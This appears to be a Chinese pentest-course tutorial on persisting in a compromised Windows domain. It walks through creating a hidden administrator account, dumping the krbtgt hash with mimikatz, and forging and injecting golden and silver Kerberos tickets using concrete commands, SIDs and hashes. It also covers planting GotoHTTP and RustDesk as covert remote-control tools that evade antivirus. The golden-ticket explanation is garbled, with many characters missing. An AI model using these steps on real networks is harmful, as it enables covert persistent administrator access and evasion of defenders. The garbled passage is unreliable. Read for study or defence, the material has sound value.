第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP

本文主要是介绍第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

案例一: 内网域&单机版-权限维持-基于用户-隐藏用户

项目下载地址: GitHub - wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具

用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所以就会导致没办法删除

域环境

域中首先查看用户

利用工具添加隐藏用户的命令

CreateHiddenAccount_upx_v0.2.exe -u jie -p admin!@#45

这个时候查看用户还是没有增加

利用工具-c命令可以查看隐藏用户

CreateHiddenAccount_upx_v0.2.exe -c

在图形界面当中可以查看到

属于administrator用户组

 

尝试能否利用

利用密码建立ipc连接

点击删除是直接可以删除掉的

单机版

添加用户

查看用户

删除的时候删除不了

案例二: 内网域-权限维持-基于服务 TGT-黄金白银票据

黄金票据

⻩⾦ 票据 成攻击,是 成有效的 TGT Kerberos 票据,并且不受 TGT 命周期的影响 TGT 默认 10 时,最多续订 7 天),这 可以为任意 ⻩⾦ 票据,然后为域管理
TGT ,这样普通 户就可以变成域管理员。

 获取域名和sid

whoami    ##获取本地账户
net time /domain   ##获取域名
whoami /all      ##获取sid:S-1-5-21-1218902331-2157346161-1782232778

获取当前域控是啥

需要获取krbtgt用户的hash,这个好像必须得高权限,但是现在做的是权限维持,你已经拿下了域控,不过是利用域控的身份在普通用户里面创建

privilege::debug
lsadump::lsa /patch /user:krbtgt   ##b097d7ed97495408e1537f706c357fc5

创建黄金票据

mimikatz kerberos::golden /user:随便一个用户 /domain:god.org /sid:用户对应的sid /krbtgt:krbtgt用户的hash /ticket:pjmimikatz kerberos::golden /user:mary /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:pj

把票据导入

kerberos::ptt pj

查看当前的票据

dir查看文件

白银票据

白银票据( SILVER TICKET )是利用域的服务账户进行伪造的 ST ,在 Kerberos 认证
的第三步, Client 带着 ST Authenticator3 Server 上的某个服务进行请求,
Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST ,从而获得
Session Key 。所以只需要知道 Server 用户的 Hash 就可以伪造出一个 ST ,且不会经
KDC ,但是伪造的门票只对部分服务起作用(不需要交互 KDC ,需要知道 Server
NTLM Hash )。

 首先获取机器用户的hash

privilege::debug
sekurlsa::logonpasswords  ##946d7b4709666cc91a496aa9e834cba8

 导入白银票据,白银票据只能借助服务运行

kerberos::golden /user:jie /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-GOD /service:cifs /rc4:946d7b4709666cc91a496aa9e834cba8 /pttkerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash  /ptt

cifs的话是文件共享服务,可以访问

案例三:内网域-权限维持-基于软件-GotoHTTP&RustDesk

GotoHTTP

下载地址:https://gotohttp.com/

gotohttp软件,优点无需安装,占用内存小,并且直接通过网页可以访问

上传以后直接执行会生成一个gotohttp.ini文件里面有访问的地址,以及账号密码

缺点是需要网络,但是内网一般是不出网的

该软件需要走的是https协议,会自动帮你解决免杀问题

一般可以利用cs中直接去查看这个文件

可以直接建立连接

RustDesk

这个程序最大的优点就是可以在内网中不用出网建立连接,并且可以绕过一部分杀毒软件

远程版,也就是需要联网,他的登录的id以及密码在下面的文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk.toml

直接输入id号通过密码连接即可

本地版

在下面这个文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk2.toml

加入这段数据

direct-server = 'Y'      ##开启IP连接
direct-access-port = '8443' ##端口   

可以在内网中直接不出网建立连接

成功建立连接

这篇关于第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1140691

相关文章

最新Spring Security实战教程之Spring Security安全框架指南

《最新SpringSecurity实战教程之SpringSecurity安全框架指南》SpringSecurity是Spring生态系统中的核心组件,提供认证、授权和防护机制,以保护应用免受各种安... 目录前言什么是Spring Security?同类框架对比Spring Security典型应用场景传统

SpringSecurity 认证、注销、权限控制功能(注销、记住密码、自定义登入页)

《SpringSecurity认证、注销、权限控制功能(注销、记住密码、自定义登入页)》SpringSecurity是一个强大的Java框架,用于保护应用程序的安全性,它提供了一套全面的安全解决方案... 目录简介认识Spring Security“认证”(Authentication)“授权” (Auth

Spring Security注解方式权限控制过程

《SpringSecurity注解方式权限控制过程》:本文主要介绍SpringSecurity注解方式权限控制过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、摘要二、实现步骤2.1 在配置类中添加权限注解的支持2.2 创建Controller类2.3 Us

Redis实现RBAC权限管理

《Redis实现RBAC权限管理》本文主要介绍了Redis实现RBAC权限管理,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录1. 什么是 RBAC?2. 为什么使用 Redis 实现 RBAC?3. 设计 RBAC 数据结构

Flutter监听当前页面可见与隐藏状态的代码详解

《Flutter监听当前页面可见与隐藏状态的代码详解》文章介绍了如何在Flutter中使用路由观察者来监听应用进入前台或后台状态以及页面的显示和隐藏,并通过代码示例讲解的非常详细,需要的朋友可以参考下... flutter 可以监听 app 进入前台还是后台状态,也可以监听当http://www.cppcn

Vue中动态权限到按钮的完整实现方案详解

《Vue中动态权限到按钮的完整实现方案详解》这篇文章主要为大家详细介绍了Vue如何在现有方案的基础上加入对路由的增、删、改、查权限控制,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、数据库设计扩展1.1 修改路由表(routes)1.2 修改角色与路由权限表(role_routes)二、后端接口设计

Android 悬浮窗开发示例((动态权限请求 | 前台服务和通知 | 悬浮窗创建 )

《Android悬浮窗开发示例((动态权限请求|前台服务和通知|悬浮窗创建)》本文介绍了Android悬浮窗的实现效果,包括动态权限请求、前台服务和通知的使用,悬浮窗权限需要动态申请并引导... 目录一、悬浮窗 动态权限请求1、动态请求权限2、悬浮窗权限说明3、检查动态权限4、申请动态权限5、权限设置完毕后

浅析如何使用Swagger生成带权限控制的API文档

《浅析如何使用Swagger生成带权限控制的API文档》当涉及到权限控制时,如何生成既安全又详细的API文档就成了一个关键问题,所以这篇文章小编就来和大家好好聊聊如何用Swagger来生成带有... 目录准备工作配置 Swagger权限控制给 API 加上权限注解查看文档注意事项在咱们的开发工作里,API

浅析Rust多线程中如何安全的使用变量

《浅析Rust多线程中如何安全的使用变量》这篇文章主要为大家详细介绍了Rust如何在线程的闭包中安全的使用变量,包括共享变量和修改变量,文中的示例代码讲解详细,有需要的小伙伴可以参考下... 目录1. 向线程传递变量2. 多线程共享变量引用3. 多线程中修改变量4. 总结在Rust语言中,一个既引人入胜又可

Java访问修饰符public、private、protected及默认访问权限详解

《Java访问修饰符public、private、protected及默认访问权限详解》:本文主要介绍Java访问修饰符public、private、protected及默认访问权限的相关资料,每... 目录前言1. public 访问修饰符特点:示例:适用场景:2. private 访问修饰符特点:示例: